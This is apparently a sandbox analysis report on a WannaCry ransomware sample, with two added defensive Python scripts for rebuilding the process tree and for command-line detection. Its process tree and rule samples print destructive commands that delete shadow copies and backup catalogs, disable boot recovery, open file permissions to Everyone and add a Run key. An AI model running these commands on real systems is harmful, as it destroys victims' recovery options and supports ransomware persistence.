Analysis
- max time kernel: 146s
- max time network: 133s
- platform: windows10_x64
- resource: win10v200430
- submitted: 14-07-2020 07:32
Static task: static1
Behavioral task: behavioral1 (sample test.vbs, resource win7)
Behavioral task: behavioral2 (sample test.vbs, resource win10v200430)
General
- Target: test.vbs
- Size: 589B
- MD5: 94d9611bf2c6e0caa430b1b0b808da1e
- SHA1: 723de46bdda58dd345b0c0bfd8bdbc33ea1931ec
- SHA256: 8cf91cb3c0524feabe3b9502aa36ec58003e9e0db849901948cd335caf0e4f66
- SHA512: 6baddf54c364c1c39bccd4f3e78f2b97f62297382c46642f6fc921fb2bc950e3ee44c6f94b5447c13faa028d9bc706ee9784582188e7a07fd3805de836b63e8e
Malware Config
Extracted from: C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt
- Family: wannacry
- Bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
-
Executes dropped EXE (17 IoCs)
Processes (pid, process):
- 640 important.exe
- 2088 taskdl.exe
- 1148 @WanaDecryptor@.exe
- 1732 @WanaDecryptor@.exe
- 2132 taskhsvc.exe
- 3668 taskse.exe
- 3556 @WanaDecryptor@.exe
- 1448 taskdl.exe
- 3608 taskdl.exe
- 3940 taskse.exe
- 1820 @WanaDecryptor@.exe
- 2088 taskdl.exe (PID 2088 reused for a second taskdl.exe instance; see the two memory/2088-* mappings below)
- 3812 taskse.exe
- 3516 @WanaDecryptor@.exe
- 1668 taskse.exe
- 3088 @WanaDecryptor@.exe
- 816 taskdl.exe
-
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid, process):
- 4020 vssadmin.exe
-
Modifies file permissions (1 TTP, 1 IoC)
-
Drops startup file (2 IoCs)
Processes: important.exe
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDC2BF.tmp (important.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDC2C6.tmp (important.exe)
-
Suspicious use of WriteProcessMemory (81 IoCs; 64 shown on this page)
Processes: WScript.exe, important.exe, cmd.exe, cmd.exe, @WanaDecryptor@.exe, cmd.exe, @WanaDecryptor@.exe, cmd.exe
Source (pid, process) -> target (pid, process); each write is logged three times unless noted:
- 3544 WScript.exe -> 640 important.exe (x3)
- 640 important.exe -> 864 attrib.exe (x3)
- 640 important.exe -> 916 icacls.exe (x3)
- 640 important.exe -> 2088 taskdl.exe (x3)
- 640 important.exe -> 2448 cmd.exe (x3)
- 2448 cmd.exe -> 2596 cscript.exe (x3)
- 640 important.exe -> 1148 @WanaDecryptor@.exe (x3)
- 640 important.exe -> 1204 cmd.exe (x3)
- 1204 cmd.exe -> 1732 @WanaDecryptor@.exe (x3)
- 1148 @WanaDecryptor@.exe -> 2132 taskhsvc.exe (x3)
- 640 important.exe -> 3668 taskse.exe (x3)
- 640 important.exe -> 3556 @WanaDecryptor@.exe (x3)
- 640 important.exe -> 1448 taskdl.exe (x3)
- 640 important.exe -> 3060 cmd.exe (x3)
- 3060 cmd.exe -> 1740 reg.exe (x3)
- 1732 @WanaDecryptor@.exe -> 1036 cmd.exe (x3)
- 1036 cmd.exe -> 4020 vssadmin.exe (x3)
- 1036 cmd.exe -> 3888 WMIC.exe (x3)
- 640 important.exe -> 3608 taskdl.exe (x3)
- 640 important.exe -> 3940 taskse.exe (x3)
- 640 important.exe -> 1820 @WanaDecryptor@.exe (x3)
- 640 important.exe -> 2088 taskdl.exe (x1; second process to receive PID 2088)
-
Suspicious use of SetWindowsHookEx (9 IoCs)
Processes (pid, process):
- 1148 @WanaDecryptor@.exe
- 1732 @WanaDecryptor@.exe
- 1148 @WanaDecryptor@.exe
- 1732 @WanaDecryptor@.exe
- 3556 @WanaDecryptor@.exe
- 3556 @WanaDecryptor@.exe
- 1820 @WanaDecryptor@.exe
- 3516 @WanaDecryptor@.exe
- 3088 @WanaDecryptor@.exe
-
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
-
Views/modifies file attributes (1 TTP, 1 IoC)
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
-
Modifies registry key (1 TTP, 1 IoC)
-
Adds Run entry to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\biiywaghgcpcp303 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run (reg.exe)
Note that reg.exe ran from C:\Windows\SysWOW64 (see the process tree), so its write to HKLM\SOFTWARE\...\Run landed in the 32-bit WOW6432Node view of the hive; a hunt that inspects only the 64-bit Run key will not see this entry.
-
Loads dropped DLL (8 IoCs)
Processes (pid, process):
- 2132 taskhsvc.exe (x8)
-
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid, process):
- 2132 taskhsvc.exe (x6)
-
Suspicious use of AdjustPrivilegeToken (53 IoCs)
Processes: taskse.exe, vssvc.exe, WMIC.exe, taskse.exe, taskse.exe, taskse.exe
Token (privilege, pid, process):
- SeTcbPrivilege 3668 taskse.exe (x2)
- SeBackupPrivilege 2768 vssvc.exe
- SeRestorePrivilege 2768 vssvc.exe
- SeAuditPrivilege 2768 vssvc.exe
- 3888 WMIC.exe, each requested twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and the privilege LUIDs 33, 34, 35, 36 (not resolved to names by the sandbox)
- SeTcbPrivilege 3940 taskse.exe (x2)
- SeTcbPrivilege 3812 taskse.exe (x2)
- SeTcbPrivilege 1668 taskse.exe (x2)
Each taskse.exe instance is started with @WanaDecryptor@.exe as its argument and requests SeTcbPrivilege, the privilege required to obtain another logon session's token (WTSQueryUserToken) and start a process in that session.
-
Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
Processes: @WanaDecryptor@.exe, important.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (@WanaDecryptor@.exe)
- Set value (str): \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp" (important.exe)
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Blacklisted process makes network request (1 IoC)
Processes (flow, pid, process):
- flow 2, 3544 WScript.exe
-
Deletes itself (1 IoC)
Processes (pid, process):
- 3544 WScript.exe
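The WriteProcessMemory list above is the raw material for the process tree further down: every "PID A wrote to memory of B" line names a parent, a child and both images, each write is logged three times, and PID 2088 appears for two different taskdl.exe processes. The following script is an added example (not part of the sandbox report or of WannaCry) that parses lines in that wording, collapses the triplicate logging without merging genuine PID reuse, and reconstructs the spawn chain from WScript.exe down to vssadmin.exe. The sample input is a constructed subset of the IoCs listed above.

```python
import re
from collections import Counter, defaultdict

# Constructed sample input: a subset of the report's WriteProcessMemory IoCs,
# in the sandbox's own one-line-per-IoC wording. Each write is logged three
# times in the report, and PID 2088 is handed out twice for taskdl.exe.
SAMPLE_IOCS = """\
PID 3544 wrote to memory of 640 3544 WScript.exe important.exe
PID 3544 wrote to memory of 640 3544 WScript.exe important.exe
PID 3544 wrote to memory of 640 3544 WScript.exe important.exe
PID 640 wrote to memory of 2088 640 important.exe taskdl.exe
PID 640 wrote to memory of 2088 640 important.exe taskdl.exe
PID 640 wrote to memory of 2088 640 important.exe taskdl.exe
PID 640 wrote to memory of 1204 640 important.exe cmd.exe
PID 640 wrote to memory of 1204 640 important.exe cmd.exe
PID 640 wrote to memory of 1204 640 important.exe cmd.exe
PID 1204 wrote to memory of 1732 1204 cmd.exe @WanaDecryptor@.exe
PID 1204 wrote to memory of 1732 1204 cmd.exe @WanaDecryptor@.exe
PID 1204 wrote to memory of 1732 1204 cmd.exe @WanaDecryptor@.exe
PID 1732 wrote to memory of 1036 1732 @WanaDecryptor@.exe cmd.exe
PID 1732 wrote to memory of 1036 1732 @WanaDecryptor@.exe cmd.exe
PID 1732 wrote to memory of 1036 1732 @WanaDecryptor@.exe cmd.exe
PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe
PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe
PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe
PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe
PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe
PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe
PID 640 wrote to memory of 2088 640 important.exe taskdl.exe
"""

# "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>";
# the backreference rejects lines whose two parent PIDs disagree.
LINE_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")


def parse_events(text):
    """Return [(ppid, pid, parent_image, child_image)] with runs of identical
    consecutive lines collapsed to one event. Non-adjacent repeats are kept:
    they are separate spawns (PID reuse), not duplicate logging."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.search(raw)
        if not m:
            continue
        ev = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
        if not events or events[-1] != ev:
            events.append(ev)
    return events


def _maps(events):
    children, parent, image = defaultdict(list), {}, {}
    for ppid, pid, pimg, cimg in events:
        children[ppid].append(pid)
        parent[pid] = ppid          # last spawn wins for a reused PID
        image[pid] = cimg
        image.setdefault(ppid, pimg)
    return children, parent, image


def reused_pids(events):
    """PIDs that were spawned more than once within the trace."""
    return {pid for pid, n in Counter(ev[1] for ev in events).items() if n > 1}


def ancestry(events, pid):
    """Image names from the tree root down to `pid`."""
    _, parent, image = _maps(events)
    chain, seen = [], set()
    while pid in image and pid not in seen:
        seen.add(pid)
        chain.append(image[pid])
        pid = parent.get(pid)
    return chain[::-1]


def render(events, root):
    """Indented one-process-per-line view of the tree under `root`."""
    children, _, image = _maps(events)
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{image[pid]} ({pid})")
        for child in children[pid]:
            walk(child, depth + 1)

    walk(root, 0)
    return lines


if __name__ == "__main__":
    evs = parse_events(SAMPLE_IOCS)
    print("\n".join(render(evs, 3544)))
    print("reused PIDs:", sorted(reused_pids(evs)))
    print(" -> ".join(ancestry(evs, 4020)))
```

Collapsing only adjacent duplicates is what keeps the second taskdl.exe under PID 2088 as its own node; a naive set-based dedupe would silently drop one of the two processes. The ancestry of PID 4020 comes out as WScript.exe -> important.exe -> cmd.exe -> @WanaDecryptor@.exe -> cmd.exe -> vssadmin.exe, the same chain the process tree below shows.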
Processes
-
depth 1: C:\Windows\System32\WScript.exe
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"
  - Suspicious use of WriteProcessMemory
  - Blacklisted process makes network request
  - Deletes itself
  depth 2: C:\Users\Admin\AppData\Local\Temp\important.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\important.exe"
    - Executes dropped EXE
    - Drops startup file
    - Suspicious use of WriteProcessMemory
    - Sets desktop wallpaper using registry
    depth 3: C:\Windows\SysWOW64\attrib.exe
      command line: attrib +h .
      - Views/modifies file attributes
    depth 3: C:\Windows\SysWOW64\icacls.exe
      command line: icacls . /grant Everyone:F /T /C /Q
      - Modifies file permissions
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      command line: taskdl.exe
      - Executes dropped EXE
    depth 3: C:\Windows\SysWOW64\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c 230491594719096.bat
      - Suspicious use of WriteProcessMemory
      depth 4: C:\Windows\SysWOW64\cscript.exe
        command line: cscript.exe //nologo m.vbs
    depth 3: C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      command line: @WanaDecryptor@.exe co
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      - Suspicious use of SetWindowsHookEx
      depth 4: C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
        command line: TaskData\Tor\taskhsvc.exe
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious behavior: EnumeratesProcesses
    depth 3: C:\Windows\SysWOW64\cmd.exe
      command line: cmd.exe /c start /b @WanaDecryptor@.exe vs
      - Suspicious use of WriteProcessMemory
      depth 4: C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
        command line: @WanaDecryptor@.exe vs
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        - Suspicious use of SetWindowsHookEx
        depth 5: C:\Windows\SysWOW64\cmd.exe
          command line: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          - Suspicious use of WriteProcessMemory
          depth 6: C:\Windows\SysWOW64\vssadmin.exe
            command line: vssadmin delete shadows /all /quiet
            - Interacts with shadow copies
          depth 6: C:\Windows\SysWOW64\Wbem\WMIC.exe
            command line: wmic shadowcopy delete
            - Suspicious use of AdjustPrivilegeToken
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskse.exe
      command line: taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    depth 3: C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      command line: @WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Sets desktop wallpaper using registry
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      command line: taskdl.exe
      - Executes dropped EXE
    depth 3: C:\Windows\SysWOW64\cmd.exe
      command line: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
      - Suspicious use of WriteProcessMemory
      depth 4: C:\Windows\SysWOW64\reg.exe
        command line: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
        - Modifies registry key
        - Adds Run entry to start application
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      command line: taskdl.exe
      - Executes dropped EXE
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskse.exe
      command line: taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    depth 3: C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      command line: @WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      command line: taskdl.exe
      - Executes dropped EXE
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskse.exe
      command line: taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    depth 3: C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      command line: @WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskse.exe
      command line: taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
    depth 3: C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
      command line: @WanaDecryptor@.exe
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
    depth 3: C:\Users\Admin\AppData\Local\Temp\taskdl.exe
      command line: taskdl.exe
      - Executes dropped EXE
depth 1: C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
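The process tree carries the behaviours that make this sample detectable from command lines alone: the cmd.exe under @WanaDecryptor@.exe vs chains vssadmin, wmic, two bcdedit settings and wbadmin into one recovery-inhibiting line, reg.exe installs a Run key, icacls grants Everyone full control, and attrib hides the working directory. Note that only vssadmin.exe and WMIC.exe are recorded as children of that cmd.exe; no bcdedit.exe or wbadmin.exe process appears in the tree, so a rule that reads the parent's full command line catches all five steps while a rule keyed on child processes sees two. The script below is an added example (not the sandbox's signature logic and not part of the report) that splits a cmd.exe chain on "&" and matches each sub-command against a small rule table. The sample rows are constructed from the command lines above plus one benign vssadmin call; the ATT&CK IDs are this example's own mapping to current technique numbers, not the report's ATT&CK v6 matrix.

```python
import re

# Rule table. The ATT&CK IDs are the current ones and are this example's own
# mapping; the report above maps to ATT&CK v6, which numbers some differently.
RULES = [
    ("shadow copies deleted via vssadmin", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow copies deleted via wmic", "T1490",
     re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
    ("boot recovery disabled via bcdedit", "T1490",
     re.compile(r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+"
                r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("backup catalog deleted via wbadmin", "T1490",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog\b", re.I)),
    ("Run key added via reg add", "T1547.001",
     re.compile(r"\breg(\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b", re.I)),
    ("ACL opened to Everyone:F via icacls", "T1222.001",
     re.compile(r"\bicacls(\.exe)?\s+.*?/grant\s+everyone:f\b", re.I)),
    ("hidden attribute set via attrib +h", "T1564.001",
     re.compile(r"\battrib(\.exe)?\s+.*?\+h\b", re.I)),
]


def segments(cmdline):
    """Split a cmd.exe chain on '&' / '&&' so every sub-command is matched on
    its own. Quoting is not honoured: a '&' inside quotes also splits."""
    return [s.strip() for s in re.split(r"&+", cmdline) if s.strip()]


def classify(cmdline):
    """Return [(description, technique, segment)] for each matching sub-command."""
    hits = []
    for seg in segments(cmdline):
        for desc, tech, rx in RULES:
            if rx.search(seg):
                hits.append((desc, tech, seg))
    return hits


# Constructed sample: (pid, image, command line) rows copied from the process
# tree above, plus one benign vssadmin invocation (pid 9999) that must not fire.
SAMPLE_PROCESSES = [
    (864, "attrib.exe", r"attrib +h ."),
    (916, "icacls.exe", r"icacls . /grant Everyone:F /T /C /Q"),
    (1204, "cmd.exe", r"cmd.exe /c start /b @WanaDecryptor@.exe vs"),
    (1036, "cmd.exe",
     r"cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
     r" & bcdedit /set {default} bootstatuspolicy ignoreallfailures"
     r" & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet"),
    (4020, "vssadmin.exe", r"vssadmin delete shadows /all /quiet"),
    (3888, "WMIC.exe", r"wmic shadowcopy delete"),
    (1740, "reg.exe",
     r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303"'
     r' /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f'),
    (9999, "vssadmin.exe", r"vssadmin list shadows"),
]


def scan(processes):
    """Run every rule over every process; one finding per matching segment."""
    findings = []
    for pid, image, cmdline in processes:
        for desc, tech, seg in classify(cmdline):
            findings.append({"pid": pid, "image": image, "technique": tech,
                             "rule": desc, "segment": seg})
    return findings


def techniques_by_pid(findings):
    """Collapse findings to {pid: {technique, ...}} for triage."""
    out = {}
    for f in findings:
        out.setdefault(f["pid"], set()).add(f["technique"])
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_PROCESSES):
        print(f"{f['pid']:>5} {f['image']:<14} {f['technique']:<10} {f['rule']}: {f['segment']}")
```

On the sample rows the chained cmd.exe (PID 1036) alone yields five T1490 findings, the benign "vssadmin list shadows" and the "start /b" launcher yield none. When this fires on a real host, check the Run value in both registry views: the reg.exe here is the 32-bit one from SysWOW64, and the sandbox recorded its write under HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run rather than the path named on the command line.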
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\0.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\00000000.res
-
C:\Users\Admin\AppData\Local\Temp\1.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\10.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\11.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\12.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\13.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\14.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\15.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\16.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\17.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\18.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\19.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\2.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\20.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\21.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\22.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\23.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\230491594719096.bat
-
C:\Users\Admin\AppData\Local\Temp\24.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\25.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\26.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\27.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\28.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\29.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\3.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\30.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\31.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\32.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\33.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\34.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\35.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\4.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\5.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\6.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\7.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\8.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\9.WNCRYT
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
-
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
-
C:\Users\Admin\AppData\Local\Temp\b.wnry
-
C:\Users\Admin\AppData\Local\Temp\c.wnry
-
C:\Users\Admin\AppData\Local\Temp\c.wnry
-
C:\Users\Admin\AppData\Local\Temp\important.exe
-
C:\Users\Admin\AppData\Local\Temp\important.exe
-
C:\Users\Admin\AppData\Local\Temp\m.vbs
-
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_romanian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_russian.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_slovak.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_spanish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_swedish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_turkish.wnry
-
C:\Users\Admin\AppData\Local\Temp\msg\m_vietnamese.wnry
-
C:\Users\Admin\AppData\Local\Temp\r.wnry
-
C:\Users\Admin\AppData\Local\Temp\s.wnry
-
C:\Users\Admin\AppData\Local\Temp\t.wnry
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\taskse.exe
-
C:\Users\Admin\AppData\Local\Temp\u.wnry
-
C:\Users\Admin\Desktop\@WanaDecryptor@.bmp
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libeay32.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
-
\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
-
memory/640-46-0x0000000010000000-0x0000000010010000-memory.dmp (Filesize 64KB)
-
memory/640-4-0x0000000000000000-mapping.dmp
-
memory/816-650-0x0000000000000000-mapping.dmp
-
memory/864-7-0x0000000000000000-mapping.dmp
-
memory/916-8-0x0000000000000000-mapping.dmp
-
memory/1036-595-0x0000000000000000-mapping.dmp
-
memory/1148-55-0x0000000000000000-mapping.dmp
-
memory/1204-56-0x0000000000000000-mapping.dmp
-
memory/1448-578-0x0000000000000000-mapping.dmp
-
memory/1668-646-0x0000000000000000-mapping.dmp
-
memory/1732-59-0x0000000000000000-mapping.dmp
-
memory/1732-58-0x0000000000000000-mapping.dmp
-
